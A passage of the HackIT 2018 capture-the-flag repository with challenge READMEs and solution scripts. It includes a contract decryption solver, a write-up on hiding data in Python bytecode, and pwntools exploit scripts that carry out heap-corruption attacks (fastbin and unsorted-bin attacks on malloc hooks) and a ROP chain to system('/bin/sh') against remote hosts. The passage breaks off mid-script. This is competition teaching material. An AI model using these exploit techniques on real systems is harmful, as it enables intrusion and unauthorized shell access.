bility":"view","type":"function"},{"constant":true,"inputs":[{"name":"text","type":"string"}],"name":"Crp","outputs":[{"name":"","type":"string"}],"payable":false,"stateMutability":"view","type":"function"},{"constant":false,"inputs":[{"name":"source","type":"string"}],"name":"stringToBytes","outputs":[{"name":"result","type":"bytes"}],"payable":false,"stateMutability":"nonpayable","type":"function"},{"inputs":[],"payable":true,"stateMutability":"payable","type":"constructor"}]); -------------------------------------------------------------------------------- /misc/Smartpher/solution/solve.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python 2 | ''' 3 | Implemented by Aaditya Purani (@aaditya_purani) 4 | There are three functions calling each both are encryption routine. 5 | First function has in-memory array written in inline assembly 6 | In zMx function, it takes plain-text as input checks block.number == 12 7 | Encryption routine in zMx utilizes it and performs calculation along with memory arr 8 | Output is passed to Crp function, which has custom rot-19 implementation 9 | then it is feeded into aXeJ which takes input as bytes and perform require check with seed owner sets 10 | As this is static bytecode, seed cannot be retrieved from bytecode. So we want players to brute seed given sha1 hash & requirements 11 | seed should be exactly 4 length which is given out in one require(bytes(seed).length == 4); checks 12 | Then implement xor checks for aXeJ function 13 | Now, to decrypt implement in reverse given below 14 | ''' 15 | cipher = "tphzqh}v}uivyznwju" # Provided in message.txt 16 | len_cipher = len(cipher) 17 | offset = len_cipher - 2 18 | cipher = list(cipher) 19 | seed = "bcmz" # Must be retrieved by bruteforce of SHA-1 Hash provided in bytecode 4d64752cadde6ea019757e09ce374aa1bdba81df 20 | cipher[offset] = chr(ord(seed[0]) ^ ord(cipher[offset])^ ord(cipher[offset-2])) 21 | cipher[offset-4] = chr(ord(seed[2]) ^ ord(cipher[offset-4]) ^ ord(cipher[offset-8])) 22 | arr_num = [2, 24, 13, 17,8, 9, 10, 5, 3, 7] # Must be retrieved carefully from memory array 23 | blk_num = 12 24 | for i in xrange(0, len_cipher): 25 | cipher[i] = chr((ord(cipher[i])^arr_num[(i+3)%10])^(12)) 26 | print "".join(cipher) 27 | 28 | # Use the rotcustom.sol to decrypt it further -------------------------------------------------------------------------------- /misc/TrapOSaur/README.md: -------------------------------------------------------------------------------- 1 | # Trap-O-Saur 2 | 3 | Python3.6 bytecode is given, Most likely players will try to RE the bytecode. After successful RE using uncompyle6 to python. Players will try to unobfuscate a code. 4 | A critical section after unobfuscation 5 | 6 | ``` 7 | eval(''+eval('str(str)[+all([])]')+eval('str(str'+eval('str('+str(eval)[eval(str((+all([])))+str((+all([[]]))))]+'l'+str(eval)[eval(str((+all([])))+str((all([])+all([])+all([])+all([])+all([])+all([]))))]+'at((+all([]))))[(+all([]))]')+str(str)[+all([])]+str(eval)[eval(str((+all([])))+str((all([])+all([])+all([])+all([])+all([])+all([]))))]+str(eval)[(all([])+all([]))]+str(eval)[(all([])+all([])+all([])+all([])+all([])+all([])+all([])+all([]))]+'t)[(all([])+all([])+all([])+all([]))]')+'r('+str((+all([])))+str((+all([[]])))+')')+eval(''+eval('str(str)[+all([])]')+eval('str(str'+eval('str('+str(eval)[eval(str((+all([])))+str((+all([[]]))))]+'l'+str(eval)[eval(str((+all([])))+str((all([])+all([])+all([])+all([])+all([])+all([]))))]+'at((+all([]))))[(+all([]))]')+str(str)[+all([])]+str(eval)[eval(str((+all([])))+str((all([])+all([])+all([])+all([])+all([])+all([]))))]+str(eval)[(all([])+all([]))]+str(eval)[(all([])+all([])+all([])+all([])+all([])+all([])+all([])+all([]))]+'t)[(all([])+all([])+all([])+all([]))]')+'r('+str((+all([])))+str((+all([[]])))+')')+eval(''+eval('str(str)[+all([])]')+eval('str(str'+eval('str('+str(eval)[eval(str((+all([])))+str((+all([[]]))))]+'l'+str(eval)[eval(str((+all([])))+str((all([])+all([])+all([])+all([])+all([])+all([]))))]+'at((+all([]))))[(+all([]))]')+str(str)[+all([])]+str(eval)[eval(str((+all([])))+str((all([])+all([])+all([])+all([])+all([])+all([]))))]+str(eval)[(all([])+all([]))]+str(eval)[(all([])+all([])+all([])+all([])+all([])+all([])+all([])+all([]))]+'t)[(all([])+all([])+all([])+all([]))]')+'r('+str((+all([])))+str((+all([[]])))+str((+all([[]])))+')')+'e'+eval('str(eval)[eval(str((+all([])))+str((+all([[]]))))]')+eval(''+eval('str(str)[+all([])]')+eval('str(str'+eval('str('+str(eval)[eval(str((+all([])))+str((+all([[]]))))]+'l'+str(eval)[eval(str((+all([])))+str((all([])+all([])+all([])+all([])+all([])+all([]))))]+'at((+all([]))))[(+all([]))]')+str(str)[+all([])]+str(eval)[eval(str((+all([])))+str((all([])+all([])+all([])+all([])+all([])+all([]))))]+str(eval)[(all([])+all([]))]+str(eval)[(all([])+all([])+all([])+all([])+all([])+all([])+all([])+all([]))]+'t)[(all([])+all([])+all([])+all([]))]')+'r('+str((all([])+all([])+all([])))+str((all([])+all([])))+')')+eval('str(eval)[eval(str((+all([])))+str((+all([[]]))))]')+'('+eval(''+eval('str(str)[+all([])]')+eval('str(str'+eval('str('+str(eval)[eval(str((+all([])))+str((+all([[]]))))]+'l'+str(eval)[eval(str((+all([])))+str((all([])+all([])+all([])+all([])+all([])+all([]))))]+'at((+all([]))))[(+all([]))]')+str(str)[+all([])]+str(eval)[eval(str((+all([])))+str((all([])+all([])+all([])+all([])+all([])+all([]))))]+str(eval)[(all([])+all([]))]+str(eval)[(all([])+all([])+all([])+all([])+all([])+all([])+all([])+all([]))]+'t)[(all([])+all([])+all([])+all([]))]')+'r('+str((+all([])))+str((all([])+all([])))+str((+all([[]])))+')')+')'+eval(''+eval('str(str)[+all([])]')+eval('str(str'+eval('str('+str(eval)[eval(str((+all([])))+str((+all([[]]))))]+'l'+str(eval)[eval(str((+all([])))+str((all([])+all([])+all([])+all([])+all([])+all([]))))]+'at((+all([]))))[(+all([]))]')+str(str)[+all([])]+str(eval)[eval(str((+all([])))+str((all([])+all([])+all([])+all([])+all([])+all([]))))]+str(eval)[(all([])+all([]))]+str(eval)[(all([])+all([])+all([])+all([])+all([])+all([])+all([])+all([]))]+'t)[(all([])+all([])+all([])+all([]))]')+'r('+str((all([])+all([])+all([])+all([])+all([])))+str((all([])+all([])+all([])+all([])+all([])+all([])+all([])+all([])))+')')+eval(''+eval('str(str)[+all([])]')+eval('str(str'+eval('str('+str(eval)[eval(str((+all([])))+str((+all([[]]))))]+'l'+str(eval)[eval(str((+all([])))+str((all([])+all([])+all([])+all([])+all([])+all([]))))]+'at((+all([]))))[(+all([]))]')+str(str)[+all([])]+str(eval)[eval(str((+all([])))+str((all([])+all([])+all([])+all([])+all([])+all([]))))]+str(eval)[(all([])+all([]))]+str(eval)[(all([])+all([])+all([])+all([])+all([])+all([])+all([])+all([]))]+'t)[(all([])+all([])+all([])+all([]))]')+'r('+str((+all([])))+str((+all([[]])))+')')+eval(''+eval('str(str)[+all([])]')+eval('str(str'+eval('str('+str(eval)[eval(str((+all([])))+str((+all([[]]))))]+'l'+str(eval)[eval(str((+all([])))+str((all([])+all([])+all([])+all([])+all([])+all([]))))]+'at((+all([]))))[(+all([]))]')+str(str)[+all([])]+str(eval)[eval(str((+all([])))+str((all([])+all([])+all([])+all([])+all([])+all([]))))]+str(eval)[(all([])+all([]))]+str(eval)[(all([])+all([])+all([])+all([])+all([])+all([])+all([])+all([]))]+'t)[(all([])+all([])+all([])+all([]))]')+'r('+str((all([])+all([])+all([])))+str((all([])+all([])))+')')+eval(''+eval('str(str)[+all([])]')+eval('str(str'+eval('str('+str(eval)[eval(str((+all([])))+str((+all([[]]))))]+'l'+str(eval)[eval(str((+all([])))+str((all([])+all([])+all([])+all([])+all([])+all([]))))]+'at((+all([]))))[(+all([]))]')+str(str)[+all([])]+str(eval)[eval(str((+all([])))+str((all([])+all([])+all([])+all([])+all([])+all([]))))]+str(eval)[(all([])+all([]))]+str(eval)[(all([])+all([])+all([])+all([])+all([])+all([])+all([])+all([]))]+'t)[(all([])+all([])+all([])+all([]))]')+'r('+str((all([])+all([])+all([])))+str((all([])+all([])))+')')+eval(''+eval('str(str)[+all([])]')+eval('str(str'+eval('str('+str(eval)[eval(str((+all([])))+str((+all([[]]))))]+'l'+str(eval)[eval(str((+all([])))+str((all([])+all([])+all([])+all([])+all([])+all([]))))]+'at((+all([]))))[(+all([]))]')+str(str)[+all([])]+str(eval)[eval(str((+all([])))+str((all([])+all([])+all([])+all([])+all([])+all([]))))]+str(eval)[(all([])+all([]))]+str(eval)[(all([])+all([])+all([])+all([])+all([])+all([])+all([])+all([]))]+'t)[(all([])+all([])+all([])+all([]))]')+'r('+str((all([])+all([])+all([])))+str((all([])+all([])))+')')+eval(''+eval('str(str)[+all([])]')+eval('str(str'+eval('str('+str(eval)[eval(str((+all([])))+str((+all([[]]))))]+'l'+str(eval)[eval(str((+all([])))+str((all([])+all([])+all([])+all([])+all([])+all([]))))]+'at((+all([]))))[(+all([]))]')+str(str)[+all([])]+str(eval)[eval(str((+all([])))+str((all([])+all([])+all([])+all([])+all([])+all([]))))]+str(eval)[(all([])+all([]))]+str(eval)[(all([])+all([])+all([])+all([])+all([])+all([])+all([])+all([]))]+'t)[(all([])+all([])+all([])+all([]))]')+'r('+str((all([])+all([])+all([])))+str((all([])+all([])))+')')+eval(''+eval('str(str)[+all([])]')+eval('str(str'+eval('str('+str(eval)[eval(str((+all([])))+str((+all([[]]))))]+'l'+str(eval)[eval(str((+all([])))+str((all([])+all([])+all([])+all([])+all([])+all([]))))]+'at((+all([]))))[(+all([]))]')+str(str)[+all([])]+str(eval)[eval(str((+all([])))+str((all([])+all([])+all([])+all([])+all([])+all([]))))]+str(eval)[(all([])+all([]))]+str(eval)[(all([])+all([])+all([])+all([])+all([])+all([])+all([])+all([]))]+'t)[(all([])+all([])+all([])+all([]))]')+'r('+str((+all([])))+str((all([])+all([])))+str((+all([[]])))+')')+eval(''+eval('str(str)[+all([])]')+eval('str(str'+eval('str('+str(eval)[eval(str((+all([])))+str((+all([[]]))))]+'l'+str(eval)[eval(str((+all([])))+str((all([])+all([])+all([])+all([])+all([])+all([]))))]+'at((+all([]))))[(+all([]))]')+str(str)[+all([])]+str(eval)[eval(str((+all([])))+str((all([])+all([])+all([])+all([])+all([])+all([]))))]+str(eval)[(all([])+all([]))]+str(eval)[(all([])+all([])+all([])+all([])+all([])+all([])+all([])+all([]))]+'t)[(all([])+all([])+all([])+all([]))]')+'r('+str((all([])+all([])+all([])+all([])+all([])+all([])))+str((+all([])))+')')+'['+str(str)[(all([])+all([])+all([])+all([])+all([])+all([])+all([]))]+'s'+str(str)[(all([])+all([])+all([])+all([])+all([])+all([])+all([]))]+eval(''+eval('str(str)[+all([])]')+eval('str(str'+eval('str('+str(eval)[eval(str((+all([])))+str((+all([[]]))))]+'l'+str(eval)[eval(str((+all([])))+str((all([])+all([])+all([])+all([])+all([])+all([]))))]+'at((+all([]))))[(+all([]))]')+str(str)[+all([])]+str(eval)[eval(str((+all([])))+str((all([])+all([])+all([])+all([])+all([])+all([]))))]+str(eval)[(all([])+all([]))]+str(eval)[(all([])+all([])+all([])+all([])+all([])+all([])+all([])+all([]))]+'t)[(all([])+all([])+all([])+all([]))]')+'r('+str((all([])+all([])+all([])+all([])))+str((all([])+all([])+all([])+all([])))+')')+str(str)[(all([])+all([])+all([])+all([])+all([])+all([])+all([]))]+'t'+str(str)[(all([])+all([])+all([])+all([])+all([])+all([])+all([]))]+eval(''+eval('str(str)[+all([])]')+eval('str(str'+eval('str('+str(eval)[eval(str((+all([])))+str((+all([[]]))))]+'l'+str(eval)[eval(str((+all([])))+str((all([])+all([])+all([])+all([])+all([])+all([]))))]+'at((+all([]))))[(+all([]))]')+str(str)[+all([])]+str(eval)[eval(str((+all([])))+str((all([])+all([])+all([])+all([])+all([])+all([]))))]+str(eval)[(all([])+all([]))]+str(eval)[(all([])+all([])+all([])+all([])+all([])+all([])+all([])+all([]))]+'t)[(all([])+all([])+all([])+all([]))]')+'r('+str((all([])+all([])+all([])+all([])))+str((all([])+all([])+all([])+all([])))+')')+str(str)[(all([])+all([])+all([])+all([])+all([])+all([])+all([]))]+'e'+str(str)[(all([])+all([])+all([])+all([])+all([])+all([])+all([]))]+eval(''+eval('str(str)[+all([])]')+eval('str(str'+eval('str('+str(eval)[eval(str((+all([])))+str((+all([[]]))))]+'l'+str(eval)[eval(str((+all([])))+str((all([])+all([])+all([])+all([])+all([])+all([]))))]+'at((+all([]))))[(+all([]))]')+str(str)[+all([])]+str(eval)[eval(str((+all([])))+str((all([])+all([])+all([])+all([])+all([])+all([]))))]+str(eval)[(all([])+all([]))]+str(eval)[(all([])+all([])+all([])+all([])+all([])+all([])+all([])+all([]))]+'t)[(all([])+all([])+all([])+all([]))]')+'r('+str((all([])+all([])+all([])+all([])))+str((all([])+all([])+all([])+all([])))+')')+str(str)[(all([])+all([])+all([])+all([])+all([])+all([])+all([]))]+eval(''+eval('str(str)[+all([])]')+eval('str(str'+eval('str('+str(eval)[eval(str((+all([])))+str((+all([[]]))))]+'l'+str(eval)[eval(str((+all([])))+str((all([])+all([])+all([])+all([])+all([])+all([]))))]+'at((+all([]))))[(+all([]))]')+str(str)[+all([])]+str(eval)[eval(str((+all([])))+str((all([])+all([])+all([])+all([])+all([])+all([]))))]+str(eval)[(all([])+all([]))]+str(eval)[(all([])+all([])+all([])+all([])+all([])+all([])+all([])+all([]))]+'t)[(all([])+all([])+all([])+all([]))]')+'r('+str((+all([])))+str((+all([[]])))+str((all([])+all([])+all([])))+')')+str(str)[(all([])+all([])+all([])+all([])+all([])+all([])+all([]))]+eval(''+eval('str(str)[+all([])]')+eval('str(str'+eval('str('+str(eval)[eval(str((+all([])))+str((+all([[]]))))]+'l'+str(eval)[eval(str((+all([])))+str((all([])+all([])+all([])+all([])+all([])+all([]))))]+'at((+all([]))))[(+all([]))]')+str(str)[+all([])]+str(eval)[eval(str((+all([])))+str((all([])+all([])+all([])+all([])+all([])+all([]))))]+str(eval)[(all([])+all([]))]+str(eval)[(all([])+all([])+all([])+all([])+all([])+all([])+all([])+all([]))]+'t)[(all([])+all([])+all([])+all([]))]')+'r('+str((all([])+all([])+all([])+all([])))+str((all([])+all([])+all([])+all([])))+')')+str(str)[(all([])+all([])+all([])+all([])+all([])+all([])+all([]))]+eval('str(eval)[eval(str((+all([])))+str((all([])+all([])+all([])+all([])+all([])+all([]))))]')+str(str)[(all([])+all([])+all([])+all([])+all([])+all([])+all([]))]+']'+eval(''+eval('str(str)[+all([])]')+eval('str(str'+eval('str('+str(eval)[eval(str((+all([])))+str((+all([[]]))))]+'l'+str(eval)[eval(str((+all([])))+str((all([])+all([])+all([])+all([])+all([])+all([]))))]+'at((+all([]))))[(+all([]))]')+str(str)[+all([])]+str(eval)[eval(str((+all([])))+str((all([])+all([])+all([])+all([])+all([])+all([]))))]+str(eval)[(all([])+all([]))]+str(eval)[(all([])+all([])+all([])+all([])+all([])+all([])+all([])+all([]))]+'t)[(all([])+all([])+all([])+all([]))]')+'r('+str((+all([])))+str((+all([[]])))+')')+eval(''+eval('str(str)[+all([])]')+eval('str(str'+eval('str('+str(eval)[eval(str((+all([])))+str((+all([[]]))))]+'l'+str(eval)[eval(str((+all([])))+str((all([])+all([])+all([])+all([])+all([])+all([]))))]+'at((+all([]))))[(+all([]))]')+str(str)[+all([])]+str(eval)[eval(str((+all([])))+str((all([])+all([])+all([])+all([])+all([])+all([]))))]+str(eval)[(all([])+all([]))]+str(eval)[(all([])+all([])+all([])+all([])+all([])+all([])+all([])+all([]))]+'t)[(all([])+all([])+all([])+all([]))]')+'r('+str((+all([])))+str((+all([[]])))+')') 8 | ``` 9 | 10 | This is basically a pyfuck version of 11 | ``` 12 | \n\ndef f(x):\n x=['s','t','e','g','o']\n\n 13 | ``` 14 | 15 | There is a roulette function as well, but it is useless. As mentioned in CTF, all flag format are 'intact' otherwise mentioned in description. 16 | Hence, any player should not try `flag{stego}` or `stego` it will give wrong answer as expected. But stego is the hint to proceed further. 17 | 18 | Python3.6 bytecode has a pecularity which can be abused to hide extra bytes into without even knowing. In Python <= 3.5 instructions in the bytecode occupied either 1 or 3 bytes, depending on if the opcode took an arugment or not. In Python 3.6 this was changed so that all instructions occupy two bytes. 19 | 20 | Hence, we figure out how many extra bytes could be added in our pyc. There is also implicit hint given in challenge name `TrapOSaur` which indicates to a tool known as `StegoSaurus` 21 | 22 | https://bitbucket.org/jherron/stegosaurus/overview 23 | 24 | After utilizing it, players will receive their hard earned flag : `flag{5t3g0_ftw}` 25 | 26 | We expect players to dig up through the difference between python versions. It's very minor but this challenge has huge relevance in *real world scenario*, as any Malware can basically hide shellcode inside a pyc file & extract it. Hence, the description either you use your hard earned leet skills indefinetly to reverse or either you think deep ;) 27 | -------------------------------------------------------------------------------- /misc/TrapOSaur/misc03.pyc: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/DefConUA/HackIT2018/5ad9717c539bb252ab11a852e9971444b0d42490/misc/TrapOSaur/misc03.pyc -------------------------------------------------------------------------------- /misc/TrapOSaur/solution/README.md: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/DefConUA/HackIT2018/5ad9717c539bb252ab11a852e9971444b0d42490/misc/TrapOSaur/solution/README.md -------------------------------------------------------------------------------- /pwn/A Heap Interface/README.md: -------------------------------------------------------------------------------- 1 | 1. Simple UAF exists. 2 | 3 | 2. The ptr at index=0 can be leaked when printing name. 4 | 5 | 3. Goal is to make malloc return a libc pointer at index=0. 6 | 7 | 4. Overwrite global_max_fast using unsorted bin attack (4 bit partial overwrite). 8 | 9 | 5. Create fastbin chain of size 0x200 and get allocation near mp_struct. 10 | 11 | 6. Leak libc 12 | 13 | 7. Determine 5th byte of libc address of \_\_malloc\_hook . 6th byte is assumed to be 0x7f. 14 | 15 | 8. Do fastbin attack near \_\_malloc\_hook with that size. 16 | -------------------------------------------------------------------------------- /pwn/A Heap Interface/exploit.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python 2 | from pwn import * 3 | from base64 import b64encode, b64decode 4 | from itertools import product 5 | 6 | p = remote("185.168.131.133",6000) 7 | #p = process("./chall1",env={"LD_PRELOAD":"./libc-2.24.so"}) 8 | #raw_input() 9 | 10 | def menu(): 11 | p.recvuntil("3. Free",timeout=8) 12 | 13 | def create(size,idx): 14 | menu() 15 | p.sendline("1") 16 | p.recvuntil(":") 17 | p.sendline(str(size)) 18 | p.recvuntil(":",timeout=8) 19 | p.sendline(str(idx)) 20 | 21 | def free(idx): 22 | menu() 23 | p.sendline("3") 24 | p.recvuntil(":") 25 | p.sendline(str(idx)) 26 | 27 | def edit(idx,data): 28 | menu() 29 | p.sendline("2") 30 | p.recvuntil(":") 31 | p.sendline(str(idx)) 32 | sleep(0.1) 33 | p.send(data) 34 | 35 | def hack(n,size,libc): 36 | target = libc + 0x397acc 37 | free(n) 38 | buf = p64(target) 39 | edit(n,buf) 40 | 41 | create(size,8) 42 | #raw_input() 43 | create(size,8) 44 | 45 | magic = libc + 0xd694f 46 | #magic = libc + 0x3f35a 47 | 48 | finale = "X"*20 49 | finale += p64(magic) 50 | edit(8,finale) 51 | 52 | create(size,8) 53 | 54 | p.interactive() 55 | 56 | def pow_solve(): 57 | postfix, sha = re.findall("SHA256\(XXXX \+ (.+)\) == (.+)", p.recvline()[:-1])[0] 58 | 59 | print postfix 60 | print sha 61 | sha = sha.replace('\r','') 62 | l = product(string.ascii_letters + string.digits, repeat=4) 63 | for XXXX in l: 64 | XXXX = "".join(XXXX) 65 | if sha256sumhex(XXXX + postfix) == sha: 66 | log.success("pow = " + XXXX) 67 | break 68 | p.sendlineafter("Give me XXXX:", XXXX) 69 | 70 | #pow_solve() 71 | name = "A"*32 72 | p.recvuntil(":") 73 | p.sendline(name) 74 | 75 | create(222,0) # 0 76 | create(0x1f0,1) # 1 77 | create(0x1f0,2) # 2 78 | create(0x7fc0,3) # 3 79 | create(0x7fb0,9) # 3 80 | create(0x7fa0,10) # 3 81 | create(0x7f90,11) # 3 82 | create(0x7f80,12) # 3 83 | create(0x7f70,13) # 3 84 | create(0x7f60,14) # 3 85 | create(0x7f50,15) # 3 86 | create(0x7f40,16) # 3 87 | create(0x7f30,17) # 3 88 | create(0x7f20,18) # 3 89 | free(0) 90 | 91 | global_max = 0x7ffff7dd57cc 92 | mp_target = 0x7ffff7dd3169 93 | lol = "A"*8 94 | # global_max_fast. 95 | lol += "\xc0\x57"; 96 | 97 | edit(0,lol) 98 | create(222,4) # 4 99 | 100 | ''' 101 | Unsorted bin attack on global_max_fast 102 | 0x200 fastbin attack on mp_ . As soon as address allocated, we get libc leak. 103 | 0x7fff fastbin attack on __malloc_hook. 104 | ''' 105 | 106 | free(1) 107 | # mp_ struct. 108 | lol = "\x69\x31" 109 | edit(1,lol) 110 | 111 | create(0x1f0,5) # 5 112 | create(0x1f0,0) # 6 113 | 114 | #buf = "X"*16 115 | #edit(6,buf) 116 | 117 | menu() 118 | p.sendline("4") 119 | p.recvuntil("Name:") 120 | p.recv(33) 121 | libc = p.recv(6).ljust(8,"\x00") 122 | libc = u64(libc) - 0x397179 123 | log.success("Libc: " + hex(libc)) 124 | raw_input() 125 | 126 | target = libc + 0x397acc 127 | 128 | mask = (target & 0xffff00000000)/0x100000000 129 | print hex(mask) 130 | #raw_input() 131 | idx_f = 3 132 | if(mask >= 0x7f30 and mask < 0x7f40): 133 | hack(18,0x7f20,libc) 134 | if(mask >= 0x7f40 and mask < 0x7f50): 135 | hack(17,0x7f30,libc) 136 | if(mask >= 0x7f50 and mask < 0x7f60): 137 | hack(16,0x7f40,libc) 138 | if(mask >= 0x7f60 and mask < 0x7f70): 139 | hack(15,0x7f50,libc) 140 | if(mask >= 0x7f70 and mask < 0x7f80): 141 | hack(14,0x7f60,libc) 142 | if(mask >= 0x7f80 and mask < 0x7f90): 143 | hack(13,0x7f70,libc) 144 | if(mask >= 0x7f90 and mask < 0x7fa0): 145 | hack(12,0x7f80,libc) 146 | if(mask >= 0x7fa0 and mask < 0x7fb0): 147 | hack(11,0x7f90,libc) 148 | if(mask >= 0x7fb0 and mask < 0x7fc0): 149 | hack(10,0x7fa0,libc) 150 | if(mask >= 0x7fc0 and mask < 0x7fd0): 151 | hack(9,0x7fb0,libc) 152 | if(mask >= 0x7fd0 and mask < 0x7fe0): 153 | hack(3,0x7fc0,libc) 154 | else: 155 | log.failure("Error mask not found") 156 | p.close() 157 | -------------------------------------------------------------------------------- /pwn/A Heap Interface/heap_interface: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/DefConUA/HackIT2018/5ad9717c539bb252ab11a852e9971444b0d42490/pwn/A Heap Interface/heap_interface -------------------------------------------------------------------------------- /pwn/Army/README.md: -------------------------------------------------------------------------------- 1 | 1. Global variable is used in alloca call. Make malloc call fail by putting negative size -1, program will simply return but not exit. 2 | 2. The global variable gets set however. 3 | 3. Overflow in promote() 4 | -------------------------------------------------------------------------------- /pwn/Army/army: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/DefConUA/HackIT2018/5ad9717c539bb252ab11a852e9971444b0d42490/pwn/Army/army -------------------------------------------------------------------------------- /pwn/Army/exploit_army.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python 2 | from pwn import * 3 | 4 | p = remote("185.168.131.122", 6000) 5 | #p = process("./final") 6 | raw_input() 7 | 8 | def menu(): 9 | p.recvuntil("a promotion") 10 | 11 | def soldier(name,size,desc,fl): 12 | menu() 13 | p.sendline("1") 14 | p.recvuntil("name:") 15 | p.sendline(name) 16 | p.recvuntil("height:") 17 | p.sendline("33") 18 | p.recvuntil("weight:") 19 | p.sendline("33") 20 | p.recvuntil("answer") 21 | p.sendline(str(size)) 22 | if fl == 6: 23 | p.recvuntil("description:") 24 | p.sendline(desc) 25 | else: 26 | pass 27 | 28 | def promote(reason): 29 | menu() 30 | p.sendline("3") 31 | p.recvuntil("answer :") 32 | p.sendline(reason) 33 | 34 | p.recvuntil("Luck : ") 35 | leak = p.recvline().strip("\n") 36 | leak = leak + "\x00"*2 37 | leak = u64(leak) - 0x6f690 38 | log.success("Libc: " + hex(leak)) 39 | libc = leak 40 | 41 | buf = "A"*8 42 | soldier(buf,96,"BB",6) 43 | promote("K") 44 | 45 | pop_rdi = p64(0x0000000000400d03) 46 | sh_str = p64(libc + 0x18cd57) 47 | system = p64(libc + 0x45390) 48 | 49 | soldier(buf,-2,"CC",8) 50 | buf = "X"*56 51 | buf += pop_rdi 52 | buf += sh_str 53 | buf += system 54 | promote(buf) 55 | 56 | p.interactive() 57 | -------------------------------------------------------------------------------- /pwn/Bank reimplemented/README.md: -------------------------------------------------------------------------------- 1 | 1. Off by one allows us to change size. 2 | 3 | 2. Need to make sure to leak using the read() function , and not fgets(). 4 | 5 | 3. Leak .text, control array of heap_ptrs. 6 | 7 | 4. Perform fastbin attack near \_\_free\_hook - 0x1000, write ptr to address which contains the money check. 8 | 9 | 5. Make heap_ptr in .text point to \_\_free\_hook - 0x1000 so that the money check passes successfully. 10 | 11 | 6. Use edit, it will allow you to write unlimited bytes, and reach \_\_free\_hook. 12 | -------------------------------------------------------------------------------- /pwn/Bank reimplemented/chall2-bank: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/DefConUA/HackIT2018/5ad9717c539bb252ab11a852e9971444b0d42490/pwn/Bank reimplemented/chall2-bank -------------------------------------------------------------------------------- /pwn/Bank reimplemented/exploit_bank.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python 2 | from pwn import * 3 | 4 | p = remote("185.168.131.144",6000) 5 | #p = process("./chall2",env={"LD_PRELOAD":"./libc-2.24.so"}) 6 | raw_input() 7 | 8 | def menu(): 9 | p.recvuntil("5. View your bank status") 10 | 11 | def cr7(idx,new_t): 12 | menu() 13 | p.sendline("2") 14 | p.recvuntil("account:") 15 | p.sendline(str(idx)) 16 | sleep(0.2) 17 | p.send(new_t) 18 | 19 | def create(title,size,desc): 20 | menu() 21 | p.sendline("1") 22 | p.recvuntil("account:") 23 | p.sendline(title) 24 | p.recvuntil("statement:") 25 | p.sendline(str(size)) 26 | sleep(0.2) 27 | p.sendline(desc) 28 | 29 | def edit_title(idx,new_t): 30 | menu() 31 | p.sendline("2") 32 | p.recvuntil("account:") 33 | p.sendline(str(idx)) 34 | sleep(0.2) 35 | p.sendline(new_t) 36 | 37 | def edit_desc(idx,new_d): 38 | menu() 39 | p.sendline("3") 40 | p.recvuntil("account:") 41 | p.sendline(str(idx)) 42 | sleep(0.2) 43 | p.sendline(new_d) 44 | 45 | def show(idx): 46 | menu() 47 | p.sendline("5") 48 | p.recvuntil("account") 49 | p.sendline(str(idx)) 50 | 51 | def shutdown(idx): 52 | menu() 53 | p.sendline("4") 54 | p.recvuntil("account:") 55 | p.sendline(str(idx)) 56 | 57 | lol = "A"*8 58 | fake_chunk = p64(0x00) 59 | fake_chunk += p64(0x51) 60 | name = "B"*16 61 | name += fake_chunk 62 | name2 = "C"*8 63 | 64 | create(lol,12,name2) # 0 65 | create(lol,20,name2) 66 | shutdown(1) 67 | create(lol,38,"FFFFFFFF") # 1 68 | 69 | # Now overflow. 70 | lol = "A"*16 71 | lol += "\xb1" 72 | create(lol,12,name2) # 2 73 | create("HHHH",48,name) # 3 74 | create("HHHH",48,"LLLLLLL") # 4 75 | 76 | shutdown(1) 77 | 78 | # Now we have 0x71 chunk overflow into 3rd. 79 | 80 | buf = "X"*16 81 | buf += p64(0xffffffffff600000) 82 | buf += "\x00\x20" 83 | create("1234",4,"6") 84 | create("1234",80,buf) 85 | 86 | # Use payload to first leak and then finally attack. 87 | payload = "Y"*87 88 | edit_title(3,payload) 89 | 90 | show(3) 91 | #p.interactive() 92 | p.recvuntil("YYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYY\n") 93 | #print p.recv(6) 94 | #p.interactive() 95 | bss = p.recv(6) 96 | bss = bss.ljust(8,"\x00") 97 | #bss = "\x88" + bss 98 | bss = u64(bss) - 0x202010 99 | log.success("Text: " + hex(bss)) 100 | raw_input() 101 | 102 | payload = "Y"*88 103 | payload += p64(0xffffffffff600000) 104 | payload += p64(0x2000) 105 | payload += p64(bss + 0x0000000000201f78) # puts@GOT 106 | edit_title(3,payload) 107 | raw_input() 108 | # Leak libc. 109 | show(4) 110 | p.recvuntil("Statement: ") 111 | libc = p.recv(6) 112 | libc += "\x00"*2 113 | libc = u64(libc) - 0x68f90 - 0x176c0 114 | log.success("Libc: " + hex(libc)) 115 | 116 | payload = "Y"*88 117 | payload += p64(0xffffffffff600000) 118 | payload += p64(0x2000) 119 | payload += p64(bss + 0x0000000000202060) # bank. 120 | edit_title(3,payload) 121 | 122 | # Leak heap. 123 | show(4) 124 | p.recvuntil("Statement: ") 125 | heap = p.recv(6) 126 | heap += "\x00"*2 127 | heap = u64(heap) - 0x10 128 | log.success("Heap: " + hex(heap)) 129 | 130 | malloc_hook = bss + 0x20203d 131 | #magic = libc + 0x3f35a 132 | magic = libc + 0xd694f 133 | #magic = libc + 0x3f306 134 | 135 | payload = "Y"*88 136 | payload += p64(0xffffffffff600000) 137 | payload += p64(0x2000) 138 | payload += p64(libc+0x3986f5) 139 | edit_title(3,payload) 140 | 141 | lol = "GGWP" 142 | create(lol,90,"HH") # 6 143 | shutdown(6) 144 | 145 | payload = "Y"*88 146 | payload += p64(0xffffffffff600000) 147 | payload += p64(0x2000) 148 | payload += p64(libc+0x3986f5) 149 | payload += "Z"*16 150 | payload += p64(0x41) 151 | payload += p64(0x00) 152 | payload += "Z"*48 153 | payload += p64(0x31) 154 | payload += p64(0x00) 155 | payload += "Z"*32 156 | payload += p64(0x71) 157 | payload += p64(libc+0x3986f5) 158 | edit_title(3,payload) 159 | 160 | #raw_input() 161 | create("GGWP",90,"LL") 162 | fake_construct = p64(0xffffffffff600000) 163 | fake_construct += p64(0x2000) 164 | fake_construct += 